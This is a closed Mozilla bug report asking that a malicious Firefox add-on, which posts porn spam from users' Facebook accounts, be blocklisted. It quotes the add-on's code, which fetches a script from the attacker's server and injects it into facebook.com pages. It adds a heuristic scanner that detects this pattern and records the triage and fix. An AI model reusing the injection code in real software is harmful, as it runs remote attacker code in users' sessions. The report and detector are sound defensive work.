Closed Bug 1212174 - found malicious addon must be blacklisted
Opened 10 years ago, closed 10 years ago

Product/Component: Toolkit :: Blocklist Policy Requests
Type: defect; Priority: Not set; Severity: normal
Status: RESOLVED FIXED
Reporter: mafiaecel; Assigned: jorgev
Whiteboard: [qa-]
Attachments: 1 file

Attached file AvantPlayer.xpi
User Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2522.0 Safari/537.36

Steps to reproduce:

Hi. This add-on, as you can see at http://i.imgur.com/07aMKGk.png, spams Facebook accounts. Here is the malicious code snippet:

    // only acts when the content page is on facebook.com
    if (doc.location.href.search("facebook.com") > -1) {
        var request = new XMLHttpRequest();
        request.onreadystatechange = function() {
            if (request.readyState == 4) {
                // builds a <script> element whose body is whatever the remote server returned
                var myScript = top.window.content.document.createElement('script');
                myScript.type = 'text/javascript';
                myScript.appendChild(document.createTextNode(request.responseText));
                myScript.setAttribute('onload', 'firefoxInit()');
                // injects it into the page's <head>, so the fetched code runs in the Facebook page
                top.window.content.document.getElementsByTagName('head')[0].appendChild(myScript);
            }
        };
        // fetches the script body from the attacker's server; the random query string defeats caching
        request.open("GET", "https://videotime.xyz/welcomef/document.php?" + "" + Math.floor(Math.random() * 99999));
        request.send();
    }

https://videotime.xyz/welcomef/document.php? is the link they are remotely executing. They are sharing porn links on Facebook accounts. http://myvideoz.xyz/async.php is their landing page.

Actual results:

Spammed Facebook accounts.

Expected results:

It mustn't share porn links on my Facebook account.
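The pattern the reporter describes (a script body fetched from a remote server and injected into facebook.com pages) is exactly what a blocklist reviewer wants to flag automatically when triaging an .xpi. The following is an added example, not code from the report or from Mozilla's review tooling: a heuristic static scan over add-on source; the function and result field names are this example's own.

```javascript
// Added example, not code from the bug report or from Mozilla's review tooling:
// a heuristic static check for the remote-script-injection pattern the reported
// add-on uses. Function and field names are this example's own.
const REMOTE_URL_RE = /\.open\(\s*["'](?:GET|POST)["']\s*,\s*["'](https?:\/\/[^"'\s]+)/gi;
const HOST_CHECK_RE = /location\.href\.(?:search|indexOf|includes|match)\(\s*["']([^"']+)["']/g;

function scanAddonSource(src) {
  const f = { remoteUrls: [], targetedHosts: [], injectsRemoteScript: false, reasons: [] };
  // Literal http(s) URLs handed to XMLHttpRequest.open(), and hostnames the
  // script gates itself on via location.href checks.
  for (const m of src.matchAll(REMOTE_URL_RE)) f.remoteUrls.push(m[1]);
  for (const m of src.matchAll(HOST_CHECK_RE)) f.targetedHosts.push(m[1]);
  // The dangerous combination: a <script> element is created, its body is taken
  // from an XHR response, and it is attached to the page. Each part is common on
  // its own; together they mean "execute whatever the server sends back".
  const createsScript = /createElement\(\s*["']script["']\s*\)/.test(src);
  const usesResponse = /\.responseText\b/.test(src);
  const attachesToDom = /\.appendChild\(/.test(src);
  if (createsScript && usesResponse && attachesToDom) {
    f.injectsRemoteScript = true;
    f.reasons.push('script element built from XHR responseText and appended to the DOM');
  }
  // A random cache-buster on the fetch URL is a secondary signal: the author
  // wants a fresh payload on every load rather than a cacheable resource.
  if (f.remoteUrls.length && /Math\.random\(\)/.test(src)) {
    f.reasons.push('random cache-buster appended to remote URL');
  }
  f.verdict = f.injectsRemoteScript ? 'block'
            : (f.remoteUrls.length || f.targetedHosts.length) ? 'review' : 'clean';
  return f;
}

// Sample input 1: the snippet quoted in the report above (abridged).
const REPORTED_SNIPPET = `
if(doc.location.href.search("facebook.com") > -1){ var request = new XMLHttpRequest;
request.onreadystatechange = function() { if (request.readyState == 4) {
var myScript = top.window.content.document.createElement('script');
myScript.appendChild(document.createTextNode(request.responseText));
top.window.content.document.getElementsByTagName('head')[0].appendChild(myScript); }; };
request.open("GET", "https://videotime.xyz/welcomef/document.php?" + "" + Math.floor(Math.random() * 99999));
request.send(); }`;
// Sample input 2 (constructed): an add-on that only reads its own bundled data.
const BENIGN_SNIPPET = `
var req = new XMLHttpRequest();
req.onload = function () { document.getElementById("out").textContent = req.responseText; };
req.open("GET", "chrome://myaddon/content/data.json");
req.send();`;

console.log(scanAddonSource(REPORTED_SNIPPET).verdict, scanAddonSource(BENIGN_SNIPPET).verdict); // block clean
```

The regexes are deliberately loose (they match minified and reformatted source alike), so a 'review' verdict is a prompt for a human look, while 'block' is reserved for the fetch-then-inject combination.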
Jorge/Kris, can you take a look? (NB: I haven't looked at the add-on yet)
Group: firefox-core-security → mozilla-employee-confidential
Component: Untriaged → Blocklisting
Flags: needinfo?(kmaglione+bmo)
Flags: needinfo?(jorge)
Product: Firefox → addons.mozilla.org
Version: 41 Branch → unspecified
Assignee: nobody → jorge
Group: mozilla-employee-confidential
Status: UNCONFIRMED → ASSIGNED
Ever confirmed: true
Flags: needinfo?(kmaglione+bmo)
Flags: needinfo?(jorge)
Whiteboard: [qa-]
Target Milestone: --- → 44.2
Status: ASSIGNED → RESOLVED
Closed: 10 years ago
Resolution: --- → FIXED
Can you blacklist their landing page as well? http://myvideoz.xyz/async.php
We don't have that capability. If you can report it to Google and it's added to their blacklist, then Firefox will not display it.
Product: addons.mozilla.org → Toolkit